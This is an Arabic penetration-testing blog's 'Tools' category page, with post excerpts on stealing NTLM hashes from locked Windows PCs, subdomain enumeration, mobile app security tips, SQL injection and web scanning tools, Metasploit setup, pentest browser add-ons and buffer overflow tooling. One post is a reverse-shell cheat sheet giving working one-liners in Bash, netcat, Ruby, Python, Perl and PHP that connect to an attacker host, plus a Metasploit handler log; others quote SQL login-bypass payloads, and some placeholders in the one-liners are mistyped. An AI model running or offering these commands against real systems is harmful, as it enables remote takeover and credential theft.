RSSمحتويات التصنيف: "أدوات"

سرقة الصلاحيات من جهاز ويندوز مغلق باستخدام USB Armory

USB Armory

موضوعنا اليوم هو موضوع جميل ومهم جدا لل pentester و ال red teamer ويصنف تحت ال Physical Social Engineering Attack. اليوم سنتعلم كيفية سرقة ال NTLM hashes من جهاز ويندوز حتى لو كان الجهاز في Locked باستخدام USB Armory device.

نستفيد من هاشات ال NTLM في سيناريوهات كثيرة منها على سبيل الذكر لا الحصر

  • الدخول على ال Shared folders
  • أو في هجمات ال PTH على الجهاز أو على الخوادم التي قد يدخلها المستخدم من جهازه المستهدف
  • تنفيذ أوامر عن بعد على الجهاز المستهدف باستخدام psexec
  • محاول كسر الهاش و الحصول على كلمة المرور الحقيقة باستخدام أداة hashcat (قد تستغرق وقت طويل جدا)
  • إلخ

الجدير بالذكر هنا أنه لن تعيقنا أي Group policy  تمنع استخدام ال USB storage لان الكمبوتر المستهدف سيتعرف عليه على أنه USB Ethernet device.

أداة Sublist3r للبحث عن الدومينات الفرعية في محركات البحث

Sublist3r_Logoمن أهم مراحل عملية إختبار الاختراق هي عملية جمع المعلومات عن الهدف , فمختبر الاختراق المحترف هو من يقوم بإجادة هذة المرحلة و يقوم بجمع المعلومات عن الهدف بشكل دقيق حتى يستطيع ان يقوم بإختراقه بعد ذلك بنجاح . و من مراحل جمع المعلومات هي تحديد الدومنيات الفرعية الخاصة بالهدف , مثلا اذا كان الهدف هو إختراق google.com فلابد ان يقوم مختبر الاختراق بالبحث عن جميع ما يخص شركة جوجل و يبحث عن نقاط الضعف بها , فمثلا سوف يقوم بالبحث عن الثغرات في mail.google.com و plus.google.com و translate.google.com و غيرها من خدمات جوجل.

أمن تطبيقات الهواتف المحمولة

شهدت السنوات القليلة الماضية ارتفاع هائل في استخدام الهواتف المحمولة الذكية بل ان عدد ما انتج وبيع ومنها زاد على عدد سكان العالم (1). ولا شك ان هذه الزيادة جعلت هذه الهواتف هدفاً خصباً للصوص الانترنت وحتى الحكومات التي تريد التجسس على مواطنيها أو مواطني دول أخرى. في المقالة السابقة ركزت على أمن الهواتف الذكية بشكل عام. هنا إن شاء الله سأركز على أمن التطبيقات.

هواتفنا اليوم تحمل جميع أسرارنا وهي لا تفارقنا في كل الاوقات على عكس الحاسب الشخصي او المحمول. هذه الهواتف تحمل صورنا ورسائلنا، تعرف من نتصله به ومتى، وتعرف كل الاماكن التي نتردد عليها. قدرات هواتفنا المحمولة هذه زادت كذلك فنراها أصبحت حواسيب مصغرة تحمل العشرات ان لم يكن المئات من البرامج. نحن كمستخدمين نقوم بتحميل هذه البرامج في كثير من الأحيان بدون أن نعرف ما الذي تقوم به هذه البرامج أو ما هي الصلاحيات التي تتطلبها.

تركيزنا هنا سيكون على الهواتف التي تعمل بنظام اندرويد كونه الأكثر انتشارا وكذلك الاكثر عرضة للاصابة بالبرامج الخبيثة التي تسهتدف المستخدم ومعلوماته وذلك لعدّة أسباب منها: نظام أندوريد يسمح بارسال رسائل نصية بدون علم المستخدم، تعدد أسواق البرامج والتي لا يوجد أي نوع من الراقبة في بعضها، سهولة إعادة تغليف البرامج الشرعية ببرمجيات خبيثة ومن ثمّ اعادة طرحها مرّة أخرى، طريقة توزيع النظام من خلال مزويدي الخدمة مع كثرة العتاد مع تأخرّ أو انعدام الدعم الفني وتحديدا التحديثات كلها أمور تجعل من النظام بئية جذابة للصوص الانترنت.

سأحاول في المستقبل إن شاء الله أن أغطي تفاصيل النظام التقنية بالتفصيل ولكن لاختصار الوقت هنا سأركز على الصلاحيات للبرامج. نظام أندوريد والذي اطلقته غوغل يسمح لشركات العتاد بإصدار هواتف تدعم حاجات وقدرات المستخدمين المختلفة. والتسهيلات التي تضعها غوغل على المطورين تجعله بئية ممتازة لهم كون القيود المفروضة عليه أقل من مثيلتها في نظام ويندوز فون وأقل بكثير منها في نظام  iOS الذي تصدره شركة آبل والذي يعد ثاني أشهر انظمة الهواتف المحمولة.

فلسفة غوغل تقوم على نظام مفتوح للجميع تنتقل فيه مسؤولية الحماية والأمان للهاتف من غوغل إلى المستخدم، ولهذا فعلى المستخدم مراقبة ما يقوم بتحميله من برامج ومعرفة صلاحيات هذه البرامج.

ما هي صلاحيات البرامج؟

كل برنامج يحتاج إلى صلاحيات حسب وظيفة هذا البرنامج يسهلها له نظام التشغيل. مثلا برنامج سكايب الذي يستخدم في الاتصالات الهاتفية سوف يحتاج الى المايكروفون والى الكاميرا الى غير ذلك من الصلاحيات. في حين ان لعبة ما قد تحتاج الى صلاحيات الوصول الى الانترنت من أجل متابعة أداء اللاعبين ونقاطهم ومراحل تقدمهم فيها. لكن عندما نشاهد مثلا برنامج لحاسبة علمية يحتاج الوصول الى الرسائل النصية،فعندها نحتاج كمستخدمين أن نتسائل لماذا يحتاج مثل هكذا برنامج الى مثل هكذا خدمة. الصورة التالية تظهر أمثلة على بعض البرامج وصلاحياته.

الصورة الأولى للعبة تطلب عدّة صلاحيات منها الموقع ومعرّف الجهاز ومعلومات عن المكالمات بالإضافة الى معلومات أخرى.

game_perms_1
الصورة الثانية لبرنامج فيسبوك والذي يطلب صلاحيات تتضمن جهات الاتصال والمايكروفون والكاميرا والرسائل النصية، إلخ.

facebook_perms

الصورة الثالثة لبرنامج f-secure والذي يقوم بإعلام المستخدم بالصلاحيات الفعلية التي تستخدمها البرامج المثبتة على هاتفه ولكنه لا يحتاج الى أي صلاحيات على الهاتف.
f-secure_perm_monitor

 

الهاتف المحمول المخترق وطرق استخدامه

شكل -1- يظهر تشريح لهاتف محمول وكيف يمكن للصوص الاستفادة منه. هذا الشكل هو من تقرير صادر لشركة سوفس وقام مجتمع الحماية بترجمة الشكل للعربية. أي هاتف يجري اختراقه يجري استخدامه طبقا لما يريده المخترق. فلصوص الانترنت هدفهم بالدرجة الاولى مادي وبالتالي سيكون اختراقهم من أجل ارسال رسائل نصية عالية التكلفة (كالرسائل التي ترسل الى برامج شهيرة للتصويت على مشترك ما او التبرع المادي لقضية ما). اما الحكومات فهدفها سيكون بالدرجة الأولى تجسسي لذلك ستحاول التلصص على المكالمات أو تسجيل المحادثات وما إلى ذلك.

 

صورة تظهر حالة هواتف أندرويد والاخطار المعرضة لها

شكل -1- صورة تظهر حالة هواتف أندرويد والاخطار المعرضة لها

 

كيف يقوم الأشرار باخترق الهواتف المحمولة

هناك عدّة طرق يمكن للاشرار استخدامها لاختراق هواتف الضحايا، أسهلها هو متابعة اشهر البرامج في السوق ومن ثم تحميلها والتعديل عليها لزرع برامج خبيثة فيها ومن ثم طرحها مجددا في السوق الرئيسي او الاسواق الأخرى. في حالة الحكومات أو غيرها من المنظمات الإجرامية يمكن أن يتم عبر انشاء شركات وهمية تقوم باصدار برامج مغرية يقوم المستخدمون العاديون بتحميلها ومن ثم اعطاء صلاحيات لها ولهم على هواتفهم. اما الطرق الأخرى للاختراق فتكون عبر استغلال ثغرة في نظام التشغيل نفسه او في أحد البرامج الشرعية او تحويل المستخدمين الى صفحات ويب وهمية لسرقة صلاحياتهم. شكل -2- يظهر كيف يقوم مطور خبيث بسرقة برنامج شرعي ومن ثم زرع برمجيته فيها ورفعها الى سوق البرامج.

شكل -2- يظهر عملية كيف يقوم الأشرار باستغلال برامج شرعية لزرع برمجياتهم الخبيثة بهدف اختراق هواتف المستخدمين

شكل -2- يظهر عملية كيف يقوم الأشرار باستغلال برامج شرعية لزرع برمجياتهم الخبيثة بهدف اختراق هواتف المستخدمين لشركة Lookout

ما العمل

تذكر أن هاتفك هو مستودع أسرارك فلا تسمح لما هب ودب من برامج بالعمل عليه.

راجع صلاحيات كل برنامج قبل ان تقوم بتثبيته على هاتفك.

لو كان برنامجك المفضل يحتاج الى صلاحيات كبيرة فابحث عن بديل له. لا يغرك أن شركة كبيرة تقوم بتطويره. الشركة فيها موظفين والموظفون ليسوا ملائكة فقد تسوّل لبعضهم انفسهم بالتلصص على وبيع معلومات المستخدمين. حصل مثل هذا سابقا ولا يوجد ما يمنع حدوثه اليوم.

قم بتثبيت برامج مثل f-secure في الصورة الثالثة أعلاه أو برنامج Dcentral لمعرفة صلاحيات البرامج على هاتفك. برنامج Dcentral يعطي تقييم لهذه البرامج بناء على نوع الصلاحيات التي تطلبها. الصورة التالية تظهر مثال لعمل برنامج Dcentral

dcentral_perms_monitor_2

أمن الهواتف الذكيّة

secmobالهواتف النّقالة، ولاسيما الذكيّة منها هي عبارة عن حواسيب محمولة. فهي تسمح لك بالوصول الى الانترنت والى بريدك الالكتروني، كذلك تسمح لك بتحميل التطبيقات والألعاب وتخزن معلوماتك الشخصية، الأشخاص الذين تتصل بهم، صورك وغيرها. لهذا أنت تحتاج الى حماية هاتفك تماماً مثلما تقوم بحماية حاسوبك المنزلي او المحمول. تذكر دائماً أنّ هاتفك الذكي ليس مجرد هاتف لذلك تأكد دائماً من انه معك في كل الأوقات.

تأمين هاتفك

قم بتفعيل خصائص الحماية على هاتفك. جميع الهواتف اليوم تحتوي على خصائص حماية لذلك تعرّف على هذه الخصائص في هاتف وفعّلها.

ضع كلمة مرور أو رقم تعريف (PIN) والذي يجب على مستخدم الهاتف أن يدخله قبل أن يبدأ باستخدام الهاتف. كلمات المرور أو الأرقام التعريفية تجعل من سرقة معلومات الشخصية من هاتفك أمراً أصعب على لصوص الهاتف أو المتلصصين.

حاول تثبيت برنامج لمكافحة الفيروسات والبرمجيات الضارة الاخرى من مرزوّد خدمة موثوق (خصوصاً ان كنت تستخدم انظمة أندرويد).

حدّث نظام التشغيل الذي يستخدمه هاتفك بشكل دوري. ثبّته متى توفر بأسرع وقت لأن هذه التحديثات في العادة تحتوي على تحديثات تساعد على حماية هاتفك. للأسف أندرويد في هذه النقطة متأخر جداً في كثير من الأحيان عن باقي الأنظمة.

اذا قمت بتفعيل خاصية بلوتوث على هاتفك (بلوتوث خاصية تسمح لك بالاتصال لاسلكياً بأدوات أخرى من أجل نقل معلومات أو غيرها من مسافة قصيرة) قم بجعل هاتفك “مختفي” بحيث لا يستطيع أن يراه الأخرون. هذا يعني أن عملية اكتشافه من قبل القراصنة ستكون أصعب إلا اذا كانوا يعرفون عنوانه. حاول أن تستخدم هذه الخاصية في مناطق خاصة أو غير مزدحمة.

عند استخدامك للانترنت عبر شبكة لاسلكية تأكد من أن تكون الشبكة مشفّرة وتكون تثق في مصدرها، سواء كانت منزلية أو مقدّمة من شركة تجارية. كذلك قم بتغيير الخصائص بحيث يقوم هاتفك بسؤالك للسماح له بالاتصال مع شبكة لاسلكية قبل أن ينضم لهذه الشبكة اللاسلكية الجديدة.

اذا كنت لا تستخدم خاصية بلوتوث أو خاصية تحديد المكان فقم بتعطيلهما. فعّل احداهما أو كلاهما عند الحاجة فقط.

استخدم خاصية المسح عن بعد (remote wipe) اذا كان هاتفك أو مزوّد الخدمة يدعم هذه الخاصية. هذه الخاصية تتيح لك مسح هاتفك وحماية معلوماتك الشخصية في حال فقدت هاتفك او تمت سرقته.

حماية معلوماتك

شفّر بياناتك. بعض الهواتف تسمح لك بتشفير البيانات المخزّنة على الهاتف نفسه أو على الذاكرة المتنقلة. التشفير سيحمي معلوماتك في حالة فقد أو سرقة هاتفك (لا قدر الله).

قم بعمل نسخة احتياطية من بياناتك بشكل دوري. اعمل لنفسك برنامج زمني (يومي أو اسبوعي مثلاً) تقوم فيه بحفظ بياناتك على حاسوبك أو على ذاكرة متنقلة (مشفرّة) واحفظها في مكان آمن.

تجنب الأماكن العامة في حال قيامك بأي معاملات بنكية. البعض يستطيع ان يرى ما الذي تكتبه على هاتفك سواء كان من خلفك أو حسب حركة يدك. وكذلك في حالة الاتصال عبر شبكة لاسلكية قد يستطيع القراصنة الوصول الى معلوماتك الشخصية والبنكية.

أمن الانترنت والتطبيقات

لا تقم بتحميل برامج قبل ان تعرف ما هي الصلاحيات التي تتطلبها هذه البرامج (كصلاحيات الوصول الى دليل الهاتف، او الكاميرا او الصور وغيرها.)

العديد من الهواتف الذكية تسمح لك بتحديد صلاحيات البرامج اذا كان هاتفك يدعم هذه الخاصية فاستفد منها للتّقليل من صلاحيات البرنامج الذي تنوي تثبيته على هاتفك.

بعض البرامج في المتاجر الالكترونية (وهذا نجده أكثر في متاجر أندرويد) تحتوي على فيروسات أو غيرها من البرمجيات الضارة. لذلك دائماً تأكد من البرامج التي تقوم بتحميلها.

هاتفك يحتوي على معلوماتك وصورك الخاصة. فكرّ جيداً في ما تحمله من برامج وما تشارك به من معلومات. هاتفك في بعض الاحيان يحتوي على معلومات خاصة أكثر من حاسوبك الشخصي. لهذا المحتالون والقراصنة بأمكانهم إن لم تكن حذراً الحصول على كم هائل من المعلومات عنك.

عند زيارتك لموقع انترنت تأكد من أنه موقع موثوق بمعنى أن تعرف هذا الموقع واستخدام HTTPS متى توفر ذلك لضمان ان تصفحك مشفر.

فكّر قبل أن تضغط عند استلامك لرسائل الميديا (MMS) أو الملحقات في البريد الالكتروني تماماً كما تفعل على حاسوبك الشخصي (نأمل أنّك تقوم بذلك :)). قد تحتوي هذه الرسائل أو الملحقات على برمجيات ضارة أو تقوم بتوجيهك الى مواقع انترنت ضارة (مثلا موقع فيسبوك مزيف لسرقة صلاحياتك ومن ثمّ حسابك على فيسبوك).

علامات على أن هاتفك مصاب ببرمجيات ضارة

هناك ارتفاع مفاجئ في فاتورة هاتفك بدون سبب واضح

هناك رسائل الكترونية او نصية في مجلد المرسل لم تقم أنت بإرسالها

واجهة هاتفك تغيرت ولم تقم أنت بهذا التغيير.

تذكّر…

هاتفك يحتوي على تفاصيل حياتك. فاحتفظ به واحمه كما تحفظ أسرارك وخصوصيّاتك بل أكثر.

إن كان لديك نصائح أخرى لم نتطرق إليها فاذكرها في التعليقات ليستفيد منها الجميع وسنقوم بإضافة الأفضل منها كتحديث على المقال.

إطلاق أداة WebPwn3r لفحص المواقع من الثغرات الخطيرة.

logo_603012_a948usc9f_screen_display1
يسرنا اليوم أن نتحدث عن إطلاق أداة WebPwn3r لفحص المواقع من الثغرات الخطيرة

والتي صممت خصيصا لمساعدة الباحثين الأمنين الذين يشاركون في مسابقات اكتشاف الثغرات التي تسمي ب Bug Bounty Programs

دعونا نشرح الأداة وطريقة عملها ..

pwn3r

الأداة تم برمجتها بلغة البايثون لتقوم بفحص المواقع من ثغرات Remote Code Injection و Remote Code Execution و XSS وكذلك ثغرات SQL Injection
الأداة تم برمجتها بواسطة كاتب الموضوع وهي حاليا تحت التطوير المستمر.

حيث يمكنك من خلال الأداة فحص رابط واحد أو عدة روابط .. رابط كمثال:
http:///site.com/namer/news.php?id=1&page=2&action=load

يمكنك انشاء ملف باسم list.txt ووضع روابط من مواقع مختلفه كالرابط بالأعلي ومن ثم تشغيل الأداة من خلال الأمر python scan.py واختيار رقم 2 لفحص جميع الروابط الموجوده داخل الملف من الثغرات الموضحه أعلاه.

المميزات الحالية في الأداة:

  • 1- فحص رابط واحد او عدد ﻻ محدود من الروابط
  • 2- اكتشاف واستغلال الثغرات من نوع Remote Code Injection
  • 3- إكتشاف وإستغلال الثغرات من نوع Remote Command Execution
  • 4- إكتشاف وإستغلال ثغرات الـ SQL Injection
  • 5- إكتشاف وإستغلال الثغرات من نوع XSS
  • 6- الكشف عن ال WebKnight الذي يستخدم كجدار ناري للمواقع – WAF ومحاولة تخطيه
  • 7- طرق إكتشاف وإستغلال الثغرات تم تطويرها بحيث تعمل علي أغلب انظمة التشغيل وكذلك لتتخطي الكثير من الجدران النارية المستخدمة في حماية المواقع من إكتشاف وإستغلال ثغراتها.
  • 8- إستخراج بيانات عن البرمجيات المستخدمه داخل السرفر وكذلك إصداراتها.

فيديو يشرح كيفية عمل الأداة وإستخدامها في فحص عدة روابط:

أحد التجارب الناجحة للأداة هي إكتشاف ثغرة Remote Code Injection في موقع الياهو:

WebPwn3r

لتحميل الإداة تفضلوا  بزيارة الرابط التالي:

https://github.com/zigoo0/webpwn3r

او من خلال الرابط المباشر:

https://github.com/zigoo0/webpwn3r/archive/master.zip

إطلاق برنامج Sculptor لحقن قواعد البيانات وبمميزات رائعة.

قبل البداية بكتابة المقال يسعدني القول بأن البرنامج من برمجة عربية مائة بالمائة ويتم تطويرة وتحديثة بشكل مستمر.
إسم البرنامج: Sculptor
إسم المبرمج: Mohamed Maati
الموقع الرسمي: http://sculptordev.com

0

برنامج Sculptor او ما يطلق عليه برنامج النحات باللغة العربية. يساعد البرنامج مختبري الاختراق في اكتشاف واستغلال الثغرات من نوع SQL Injection
ويجب التنبيه إلي ان البرنامج مجاني تماما وهو بديل رائع لبرنامج Havij الواسع الإنتشار في هذا المجال والذي يصل ثمنه الي 650 دولار أمريكي!

1-2

خصائص ومميزات برنامج النحات هي كالتالي:

1. يدعم الحقن في قواعد البيانات من نوع:

· MySQL

· SQL Server

·Microsoft Access

1-3

2. يدعم الأنواع التالية من الحقن:

Error Based + Union Injection

· Blind SQl Injection

3. خاصية : Auto Scanning الفحص التلقائي للموقع واختباره واكتشاف ما به من ثغرات ومن ثم  يمكنك استغلالها بنفس البرنامج أيضا.

5

4. خاصية  Authentication Bypass: اول برنامج يوجد به امكانية استغلال هذا النوع من الثغرات حيث تتيح لك هذه الخاصية تخطي لوحة دخول مدير الموقع من خلال تجريب عدة Payloads مثال علي هذه الثغرة or ‘1’=’a’– أو a’ or ‘a’=’a وغيرها.

2-2

5. خاصية Auto Detects : امكانية تحديد نوع الحقن وقاعدة البيانات بشكل تلقائي.

6. خاصية specific injections: يتيح لمختبر الاختراق بتحديد نوع الحقن وقاعدة البيانات.

7. البرنامج يدعم حقن المواقع التي تعمل ببروتوكول HTTPS وكما نعلم فإن النسخة المجانية من Havij ﻻ تدعم مثل هذه الخاصية.

8. يدعم البرنامج الحقن في GET and POST

9. خاصية HTTP Post Engine feature : امكانية استغلال ثغرات SQLI with POST Type بثلاثة طرق مختلفة مع واجهة بسيطة للمستخدم.

10. يتيح للمستخدم امكانية تنفيذ اوامر على قاعدة البيانات وعرض النتائج.

4

11. امكانية حفظ النتائج بامتداد XML Or HTML.

12. امكانية الحقن فى اكثر من قاعدة بيانات متاحه.

13. امكانية استخدام بروكسي للتخفي عند استخدام البرنامج.

14. امكانية البحث عن لوحة تحكم مدراء المواقع Admin page finder

6

15. البرنامج ذو واجهة رسومية جيدة وسهله للمستخدم وهذا ما يفرقه عن الأداة القوية SQL Map.

يمكنكم مشاهدة بعض الفيديوهات التي تشرح بعض خصائص البرنامج من خلال الروابط التالية:

Sculptor – Sql Injection – Get All DataBases

http://www.youtube.com/watch?v=Qo_5YYO1vBc

Sculptor – Blind SQl Injection
http://www.youtube.com/watch?v=iQ7MKD8DpbA

Sculptor – Sql Authentication Bypass
http://www.youtube.com/watch?v=yBgfGakJ6Lo

Sculptor – Sql injection – Http Post Method

http://www.youtube.com/watch?v=rSplmBCaKNY

باقي الفيديوهات: http://www.youtube.com/user/SculptorScanner?feature=watch

ويمكنكم تحميل البرنامج ومتابعة التحدثيات من خلال الموقع الرسمي للبرنامج: http://sculptordev.com

إعداد Metasploit مع قاعدة البيانات Postgress على Kali

أصبحت الأمور أكثر استقرارا و أكثر سهولة في Kali. في هذا الموضوع السريع سنضع طريقة ربط مشروع Metasploit بقاعدة بيانات PostGres لتسريع عملية تشغيل الميتاسبلويت وعملية البحث فيها.

1. تشغيل الخدمات

service postgresql start
service metasploit start

– لتشغيل الخدمات تلقائيا بعد إعادة تشغيل النظام
update-rc.d postgresql enable
update-rc.d metasploit enable

 

2. تشغيل مشروع Metasploit

msfconsole
[box style=”red”]
ملاحظة: لا تقم بتشغيل الميتاسبلويت من المسار الرئيسي
/opt/metasploit/apps/pro/msf3
بل استخدم الأمر السابق مباشرة من سطر الأوامر
[/box]

3. للتأكد

msf > db_status
[*] postgresql connected to msf3
msf >

إضافات Firefox مميزة لمختبري الإختراق

Mozilla-Firefox-add-ons1

متصفح Firefox هو واحد من أشهر متصفحات الإنترنت و يتم الإعتماد عليه من قبل الكثير من المستخدمين حول العالم و اهم ما يميز متصفح فايرفوكس انه يدعم نظام الإضافات ( Addons ) حيث يتوفر له الآلاف من الأضافات المجانية التي تساعد و تعزز من اداء المتصفح و إمكانياته بشكل كبير ,كما ان المتصفح يستخدمه الكثير من مختبري الإختراق أو الـ Penetration Testers و من المعروف ان مختبر الإختراق دائما ما يحتاج إلى ادوات تساعدة في اداء عمله

في هذة المقالة سوف نحاول ان نستعرض اهم إضافات Firefox التي تفيد مختبري الإختراق و التي تسهل و وتوفر الكثير من الوقت و المجهود و التي لا استطيع انا شخصياً الإستنغاء عنها 🙂

sqlinjectme SQL Inject ME

اضافة مفيدة تساعد على إختبار و الكشف عن ثغرات Sql Injection في التطبيقات عن طريق إختبار جميع المدخلات بالصفحة (Forms) و التحقق في حاله حدوث خطاء يدل على وجود ثغرة من نوع Sql Injection

Live HTTP Headerslivehttpheaders

إضافة جميلة جداً تساعد على إلتقاط جميع الـ Http Headers عند زياره صفحة كالـ Sniffer مع امكانية إعادة إرسال الطلب مرة اخرى و التعديل على الـ Headers المرسلة مثل Referer ,Cookies او POST Data و غيرهم

Wappalyzerwapplayzer

إضافة قوية للغاية و في رأي إضافة لا يمكن الأستغناء عنها ابداً فهي اضافة تساعد على عمل Fingerprinting للكثير من الاشياء كنوع و إصدار خادم الويب و نظام التشغيل الخاص بالسيرفر و التقنيات المستخدمة في انشاء و برمجة الموقع مع امكانية التعرف بشكل تلاقئ و سريع على تطبيق الويب المستخدم مثل WordPress , Joomla , Opencart , Roundcube و غيرهم الكثير .

XSS-Mesqlinjectme

اضافة مشابة لنفس فكرة اضافة Sql Inject Me لكن هذة الأضافة تقوم بإختبار تطبيق الويب للثغرات من نوع Cross Site Scripting او XSS من خلال تجربة الكثير من Xss Payloads و التحقق في حاله وجود ثغرة .

User Agent Switcheruseragent

اضافة سهله و مفيدة تقوم بتغير نوع المتصفح او الـ Useragent و التي قد تكون مفيدة احياناً عند عند الحاجة لإختبار تطبيق الويب الذي يعمل على اجهزة الموبايل و ليس على المتصفحات العادية فمن الممكن عن طريق هذة الأضافة تزيف نوع المتصفح عندما يحاول التعرف عليه الخادم .

Firesheep firesheep

إضافة شهيرة و معروفة لدى الكثير الأن و هي تعمل بالظبط كـ Packet Sniffer للتجسس على الشبكات و التقاط معلومات Cookies المرسلة من خلال الأجهزة المتصلة على الشبكة و التى تفيد بعد ذلك مختبر الإختراق في الحصول على معلومات المستخدمين

FlagFoxflagfox

إضافة جميلة و مفيدة تعمل مباشرة عند زيارة صفحة الموقع و تساعد بالحصول على معلومات مثلا IP address الخاص بالخادم و اسم و علم الدولة الموجود فيها الخادم عن طريق الـ GEOIP

Tamper Data tamperdata

إضافة مشابة لإضافة الـ Live Http Headers و قد تكون أسهل من ناحية الإستخدام حيث تساعد على التقاط الـ http requests المرسلة للخادم مع امكانية التعديل عليها بنفس الحظة

Leet Keytamperdata

إضافة مفيدة تساعد مختبر الإختراق على التشفير و فك التشفير لكثير من انواع التشفير مثل BASE64 , URL BIN , ENCODE , HEX و كل ذلك بإستخدام إختصارات للكيبورد مباشرة من المتصفح و بطريقة سهله للغاية

Elite Proxy Switcherelite

إضافة بسيطة تساعد على تفعيل و تعديل اعدادات الـبروكسي او تعطيلها بضغطة ماوس مباشر بشكل سريع دون الحاجة لعملها من اعدادات المتصفح التقليدية .

HackBarhackbar

إضافة بسيطة ومبرمجة خصيصاً لمختبري الإختراق حتى تساعد على إختبار ثغرات Sql Injections و Xss و المساعدة على كتابة الإستعلامات الخاصة بحقن قواعد البينات بشكل سريع مثلا Union Select و استخدام انواع التشفير المختلفة مثل MySQL CHAR و MD5 و غيرها .

و إلى هنا قد نكون ذكرنا و استعرضنا أهم إضافات المتصفح المفيدة لمختبري الإختراق و التي تعمل بشكل تلاقئ و سريع دون الحاجة لإستخدام ادوات منفصلة لعمل ذلك , و لكن بالطبع قد لا تكون هذة هي كل الإضافات الموجودة و المتوفرة لمختبري الإختراق فلذلك اذا كان لديك اقتراح على إضافات أخرى مفيدة ارجو إعلامي بذلك حتى يتم إضافاتها للقائمة 🙂

انشاء اتصال عكسي من سطر واحد وبعدة لغات

[toc]

 

هذه معاني المتغيرات التي ستجدها في الشرح. استبدلها عند التطبيق.
$ATTCKER_IP: هو عنواد المهاجم
$ATTACKER_PORT: هو المنفذ الذي ينصت عليه الضحية

$VICTIM_IP: هو عنواد المهاجم
$VICTIM_PORT: هو المنفذ الذي ينصت عليه الضحية

Listining

تستطيع الإنصات بأي طريقة تحبها
– NetCat
nc -lvp $ATTACKER_PORT
أو
ncat -lvp $ATTACKER_PORT

– Metasploit
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=$ATTCKER_IP LPORT=$ATTACKER_PORT E

PAYLOAD => windows/shell/reverse_tcp
LHOST => $ATTCKER_IP
LPORT => $ATTCKER_PORT
[*] Started reverse handler on $ATTCKER_IP:$ATTCKER_PORT
[*] Starting the payload handler...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to $VICTIM_IP
[*] Command shell session 1 opened ($ATTCKER_IP:$ATTCKER_PORT -> $VICTIM_IP:47657) at 2013-03-15 06:51:17 -0500

Reverse connection

طبعا كل ما سيطبق هنا هو على جهاز الضحية.
[box style=”tip”]
إذا كان جهاز الضحية ويندوز سنستبدل “/bin/bash” أو “/bin/sh” بـ cmd.exe
[/box]

 

Bash

bash -i >& /dev/tcp/$ATTCKER_IP/$ATTCKER_PORT 0>&1

 

NetCat

nc -nvv $ATTCKER_IP $ATTCKER_PORT -e /bin/bash
أو
nc -c /bin/sh $ATTCKER_IP $ATTCKER_PORT

 

Ruby

ruby -r socket -e ' f=TCPSocket.open("$ATTCKER_IP",$ATTCKER_PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

 

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ATTCKER_PORT",$ATTCKER_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

Perl

perl -e 'use Socket;$i="$ATTCKER_PORT";$p=$ATTCKER_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))) {open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

 

Php

php -r '$sock=fsockopen("$ATTACKER_IP",$ATTACKER_PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
مصدر 1

Buffer Overflow tutorial – Part 1: Tools

[toc]

 
 

مقدمة

سأسرد لكم بعض أهم الأدوات المستخدمة في عملية اكتشاف وكتابة استغلال ثغرات الـ Buffer Overflow. بالطبع هذه الأدوات ليست الوحيدة ولكنها الأشمل والأشهر. إذا رأيت أن هناك أداة مهمة تستحق أن تضاف إلى هذه القائمة الرجاء ذكرها في التعليقات.

 

تثبيت Ruby 1.9.3 على أوبونتو

تثبيت Ruby 1.9.3 على أوبونتو apt-get -y install ruby1.9.1-full جعل الإصدار 1.9.3 هو الإصدار الافتراضي update-alternatives --config ruby

There are 2 choices for the alternative ruby (providing /usr/bin/ruby). Selection Path Priority Status ———————————————————— * 0 /usr/bin/ruby1.8 50 auto mode 1 /usr/bin/ruby1.8 50 manual mode 2 /usr/bin/ruby1.9.1 10 manual mode Press enter to keep the current choice[*], or type selection number: 2 update-alternatives: using /usr/bin/ruby1.9.1 to provide /usr/bin/ruby (ruby) in manual mode.

جعل الـ gem الخاص بالإصدار 1.9.3 هو الافتراضي update-alternatives --config gem

There are 2 choices for the alternative gem (providing /usr/bin/gem). Selection Path Priority Status ———————————————————— * 0 /usr/bin/gem1.8 180 auto mode 1 /usr/bin/gem1.8 180 manual mode 2 /usr/bin/gem1.9.1 10 manual mode Press enter to keep the current choice[*], or type selection number: 2 update-alternatives: using /usr/bin/gem1.9.1 to provide /usr/bin/gem (gem) in manual mode.

للتأكد ruby --version

1.9.3p0 (2011-10-30 revision 33570) [x86_64-linux]

gem -v

1.8.11

تثبيت بعض الـ gems التي قد نحتاجها gem install pry colorize

 

تحميل المنقح Immunity debugger

راجع موضوع :  شرح امكانيات برنامج Immunity debugger – الواجهة

 

تحميل إضافة mona.py

إضافة mona.py هي إضافة رائعة لبرنامج Immunity debugger من تطوير الرائع Peter Van وفريقه وهي البديل الجديد لإضافته السابقة pvefindaddr التي كنا قد تحدثنا عنها سابقا
رابط التحميل 
أو ستجدها افتراضيا عند تحميل Buffer Overflow kit ضمن الأدوات الإضافية.
طريقة تركيب الإضافة مع Immunity debugger هي نفس طريقة تركيب pvefindaddr
– أغلق برنامج Immunity debugger
– ضع الإضافة في المسار (C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands)
– شغل برنامج Immunity debugger

 

تحميل الـ Metsploit

رابط التحميل

 

تحميل أداة Buffer Overflow Kit

أداة Buffer Overflow Kit  حيث تجمع عدة أدوات في مكان واحد من تطوير مجتمع الحماية العربي وسنقوم باستخدامها لاحقا بإذن الله.